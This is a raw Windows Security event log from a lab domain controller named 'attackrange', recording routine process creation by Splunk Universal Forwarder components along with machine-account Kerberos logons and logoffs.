Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264255
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264257
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264258
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1898
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264259
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1820
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264261
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264260
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1260
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:59:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264262
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBDE5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264265
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DF61C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264264
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DF61C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62460
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264263
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DF61C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264267
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x124c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264266
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264268
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x868
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264269
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264270
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264272
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1314
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264271
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:00:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264275
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E2FF4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:00:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264274
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E2FF4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62473
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:00:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264273
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E2FF4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264277
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264276
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1644
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264278
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1058
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
